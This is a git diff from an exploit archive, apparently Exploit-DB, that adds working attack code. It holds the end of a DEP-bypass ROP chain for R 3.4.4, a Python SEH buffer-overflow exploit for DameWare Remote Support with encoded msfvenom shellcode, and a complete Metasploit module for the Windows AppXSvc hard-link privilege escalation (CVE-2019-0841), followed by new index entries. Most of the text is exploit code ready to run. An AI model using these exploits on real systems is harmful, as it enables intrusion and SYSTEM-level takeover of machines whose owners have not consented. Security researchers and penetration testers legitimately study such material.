+ 0x6379973c, # ptr to &VirtualProtect() [IAT methods.dll]
+ 0x6fee2984, # MOV EAX,DWORD PTR DS:[EAX] # RETN [grDevices.dll]
+ 0x6ca1ba76, # XCHG EAX,ESI # RETN [R.dll]
+ 0x64c45cb8, # POP ECX # RETN ** [methods.dll] ** | {PAGE_EXECUTE_READ}
+ 0x64c46010, # &Writable location [methods.dll]
+ 0x6cacc7e2, # POP EAX # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
+ 0xffffffc0, # Value to negate, will become 0x00000040
+ 0x7139c7ba, # NEG EAX # RETN ** [stats.dll] ** | {PAGE_EXECUTE_READ}
+ 0x6ca3485a, # XCHG EAX,EDX # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
+ 0x7135a862, # POP EAX # RETN ** [stats.dll] ** | {PAGE_EXECUTE_READ}
+ 0xfffffdff, # Value to negate, will become 0x00000201
+ 0x6e7d41ca, # NEG EAX # RETN ** [utils.dll] ** | {PAGE_EXECUTE_READ}
+ 0x63742597, # XCHG EAX,EBX # RETN ** [Rgraphapp.dll] ** | {PAGE_EXECUTE_READ}
+ 0x6cbef3c0, # POP EAX # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
+ 0x41414141, # Filler (compensate)
+ 0x6c9b1de7, # POP EBP # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
+ 0x6ca2a9bd, # & jmp esp [R.dll]
+ 0x6cbebfa6, # POP EAX # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
+ 0x90909090, # nop
+ 0x6ca00e93, # POP EDI # RETN [R.dll]
+ 0x6375fe5c, # RETN (ROP NOP) [Rgraphapp.dll]
+ 0x6ff1b7bb, # PUSHAD # RETN [grDevices.dll]
+ ]
+
+ return ''.join(struct.pack('> AMT >> AMT Settings dialog
+# Mark "Use SOCKS proxy" box
+# Paste the string in the Host field
+
+junk = "\x41" * 1672
+
+# Unicode compatible padding
+nseh = "\x61\x43"
+
+# 007A007B - POP POP RET
+seh = "\x7B\x7A"
+
+align = ""
+align += "\x05\x20\x11" # add eax,0x11002000
+align += "\x71" # Venetian Padding
+align += "\x2d\x19\x11" # sub eax,0x11001900
+align += "\x71" # Venetian Padding
+align += "\x50" # push eax
+align += "\x71" # Venetian Padding
+align += "\xC3" # RETN
+
+padding = "\x41" * 11
+
+junk2 = "\x41" * 870
+junk3 = "\x41" * 2014
+
+# msfvenom -p windows/exec CMD=calc -f raw > shellcode.raw
+# ./alpha2 eax --unicode --uppercase < shellcode.raw
+# 508 bytes
+shellcode = "PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLYX4BM0M0KPQP4IZEP17PQTDKPPNPTK1BLLDK1BLTTKT2MXLOVWPJMV01KO6LOLS13LM2NLMPWQHOLMM1WWK2KBPR27TKPRLP4K0JOLTK0LN1D8K3OXKQJ1R1TKPYMPM1HS4KPILXYSOJQ9DKOD4KM1XVNQKO6LGQ8OLMM1WWP89PRUZVLCSMKHOKSMMT2UJD1HDKQHNDKQJ31VTKLL0K4K1HMLM1J3DKKTTKM1HP3YQ4O4ND1K1KQQR9PZ0QKOYPQOQOQJDKLRZKTM1MRJM1DMCUH2KPKPKPPPQXP1TKBOU7KOHUWKL07EFB0V38W6V5WMUMKOJ5OLM63LLJ3PKKIP2UKUWK17MCBRROQZM0B3KOZ51S1Q2LQSKPA"
+
+
+crash = junk + nseh + seh + padding + align + junk2 + shellcode + junk3
+
+print(crash)
\ No newline at end of file
diff --git a/exploits/windows/local/47128.rb b/exploits/windows/local/47128.rb
new file mode 100755
index 000000000..7d28ec2c7
--- /dev/null
+++ b/exploits/windows/local/47128.rb
@@ -0,0 +1,128 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = NormalRanking
+
+ include Exploit::EXE
+ include Post::File
+ include Post::Windows::Priv
+ include Post::Windows::FileInfo
+ include Exploit::FileDropper
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'AppXSvc Hard Link Privilege Escalation',
+ 'Description' => %q(
+ There exists a privilege escalation vulnerability for
+ Windows 10 builds prior to build 17763. Due to the AppXSvc's
+ improper handling of hard links, a user can gain full
+ privileges over a SYSTEM-owned file. The user can then utilize
+ the new file to execute code as SYSTEM.
+
+ This module employs a technique using the Diagnostics Hub Standard
+ Collector Service (DiagHub) which was discovered by James Forshaw to
+ load and execute a DLL as SYSTEM.
+ ),
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Nabeel Ahmed', # Vulnerability discovery and PoC
+ 'James Forshaw', # Code creating hard links and communicating with DiagHub service
+ 'Shelby Pace' # Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2019-0841' ],
+ [ 'URL', 'https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841/' ],
+ [ 'URL', 'https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html' ],
+ [ 'URL', 'https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html' ],
+ [ 'URL', 'https://0x00-0x00.github.io/research/2019/05/30/Coding-a-reliable-CVE-2019-0841-Bypass.html' ]
+ ],
+ 'Targets' =>
+ [
+ [ 'Windows 10', { 'Platform' => 'win' } ]
+ ],
+ 'DisclosureDate' => '2019-04-09',
+ 'DefaultTarget' => 0
+ ))
+ end
+
+ def check
+ return CheckCode::Unknown if sysinfo['OS'] !~ /windows\s10/i
+
+ path = expand_path('%WINDIR%\\system32\\win32k.sys')
+ major, minor, build, revision, brand = file_version(path)
+ return CheckCode::Appears if build < 17763
+
+ CheckCode::Detected
+ end
+
+ def upload_file(file_name, file_path)
+ contents = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-0841', file_name))
+ write_file(file_path, contents)
+ register_file_for_cleanup(file_path)
+ rescue
+ fail_with(Failure::UnexpectedReply, 'Failed to write file contents to target')
+ end
+
+ def init_process
+ print_status("Attempting to launch Microsoft Edge minimized.")
+ cmd_exec("cmd.exe /c start /min microsoft-edge:", nil, 30)
+ end
+
+ def mk_hard_link(src, target, link_exe)
+ out = cmd_exec("cmd.exe /c #{link_exe} \"#{src}\" \"#{target}\"")
+
+ return (out && out.include?('Done'))
+ end
+
+ def write_payload
+ print_status('Writing the payload to disk')
+ code = generate_payload_dll
+ @original_data = read_file(@rtf_path)
+ write_file(@rtf_path, code)
+ end
+
+ def exploit
+ vuln_status = check
+ fail_with(Failure::NotVulnerable, 'Failed to detect Windows 10') if vuln_status == CheckCode::Unknown
+
+ fail_with(Failure::None, 'Already running with SYSTEM privileges') if is_system?
+ cmd_exec("taskkill /F /IM MicrosoftEdge.exe /FI \"STATUS eq RUNNING\"")
+ dat_path = expand_path("%USERPROFILE%\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Settings\\Settings.dat")
+ fail_with(Failure::NotFound, 'Path does not exist') unless exist?(dat_path)
+
+ if session.arch == ARCH_X86
+ exe_name = 'CVE-2019-0841_x86.exe'
+ f_name = 'diaghub_load_x86.exe'
+ elsif session.arch == ARCH_X64
+ exe_name = 'CVE-2019-0841_x64.exe'
+ f_name = 'diaghub_load_x64.exe'
+ end
+ link_file_name = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(6...8)}.exe")
+ upload_file(exe_name, link_file_name)
+
+ @rtf_path = expand_path('%WINDIR%\\system32\\license.rtf')
+ fail_with(Failure::UnexpectedReply, 'Did not retrieve expected output') unless mk_hard_link(dat_path, @rtf_path, link_file_name)
+ print_good('Successfully created hard link')
+ init_process
+ cmd_exec("taskkill /F /IM MicrosoftEdge.exe")
+
+ write_payload
+ diaghub_path = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(8..12)}")
+ upload_file(f_name, diaghub_path)
+ cmd = "\"#{diaghub_path}\" \"license.rtf\""
+ cmd_exec(cmd)
+ end
+
+ def cleanup
+ folder_path = expand_path("%TEMP%\\etw")
+ dir_rm(folder_path)
+
+ write_file(@rtf_path, @original_data)
+ super
+ end
+end
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 7164028fe..52b8cdba6 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6509,6 +6509,7 @@ id,file,description,date,author,type,platform,port
47113,exploits/windows/dos/47113.txt,"Microsoft Font Subsetting - DLL Heap Corruption in ComputeFormat4CmapData",2019-07-12,"Google Security Research",dos,windows,
47119,exploits/android/dos/47119.txt,"Android 7 - 9 VideoPlayer - 'ihevcd_parse_pps' Out-of-Bounds Write",2019-07-15,"Marcin Kozlowski",dos,android,
47120,exploits/windows/dos/47120.rb,"Microsoft Windows Remote Desktop - 'BlueKeep' Denial of Service (Metasploit)",2019-07-15,"RAMELLA Sebastien",dos,windows,3389
+47127,exploits/windows/dos/47127.txt,"Microsoft Compiled HTML Help / Uncompiled .chm File - XML External Entity Injection",2019-07-16,hyp3rlinx,dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10592,6 +10593,9 @@ id,file,description,date,author,type,platform,port
47105,exploits/windows/local/47105.py,"SNMPc Enterprise Edition 9/10 - Mapping Filename Buffer Overflow",2019-07-11,xerubus,local,windows,
47115,exploits/windows/local/47115.txt,"Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation",2019-07-12,"Google Security Research",local,windows,
47116,exploits/windows/local/47116.py,"Streamripper 2.6 - 'Song Pattern' Buffer Overflow",2019-07-15,"Andrey Stoykov",local,windows,
+47122,exploits/windows/local/47122.py,"R 3.4.4 (Windows 10 x64) - Buffer Overflow SEH (DEP/ASLR Bypass)",2019-07-16,blackleitus,local,windows,
+47126,exploits/windows/local/47126.py,"DameWare Remote Support 12.0.0.509 - 'Host' Buffer Overflow (SEH)",2019-07-16,"Xavi Beltran",local,windows,
+47128,exploits/windows/local/47128.rb,"Microsoft Windows 10 < build 17763 - AppXSvc Hard Link Privilege Escalation (Metasploit)",2019-07-16,Metasploit,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17550,6 +17554,7 @@ id,file,description,date,author,type,platform,port
47076,exploits/windows/remote/47076.py,"Microsoft Exchange 2003 - base64-MIME Remote Code Execution",2019-07-05,"Charles Truscott",remote,windows,25
47080,exploits/unix/remote/47080.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)",2019-07-07,"Brian Peters",remote,unix,80
47114,exploits/multiple/remote/47114.rb,"Xymon 4.3.25 - useradm Command Execution (Metasploit)",2019-07-12,Metasploit,remote,multiple,
+47129,exploits/linux/remote/47129.rb,"PHP Laravel Framework 5.5.40 / 5.6.x < 5.6.30 - token Unserialize Remote Command Execution (Metasploit)",2019-07-16,Metasploit,remote,linux,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41499,3 +41504,6 @@ id,file,description,date,author,type,platform,port
47117,exploits/hardware/webapps/47117.txt,"NETGEAR WiFi Router JWNR2010v5 / R6080 - Authentication Bypass",2019-07-15,Wadeek,webapps,hardware,
47118,exploits/hardware/webapps/47118.txt,"CISCO Small Business 200 / 300 / 500 Switches - Multiple Vulnerabilities",2019-07-15,Ramikan,webapps,hardware,
47121,exploits/php/webapps/47121.txt,"FlightPath < 4.8.2 / < 5.0-rc2 - Local File Inclusion",2019-07-15,"Mohammed Althibyani",webapps,php,80
+47123,exploits/linux/webapps/47123.txt,"CentOS Control Web Panel 0.9.8.836 - Authentication Bypass",2019-07-16,"Pongtorn Angsuchotmetee",webapps,linux,
+47124,exploits/linux/webapps/47124.txt,"CentOS Control Web Panel 0.9.8.836 - Privilege Escalation",2019-07-16,"Pongtorn Angsuchotmetee_ Nissana Sirijirakal_ Narin Boonwasanarak",webapps,linux,
+47125,exploits/linux/webapps/47125.txt,"CentOS Control Web Panel 0.9.8.838 - User Enumeration",2019-07-16,"Pongtorn Angsuchotmetee_ Nissana Sirijirakal_ Narin Boonwasanarak",webapps,linux,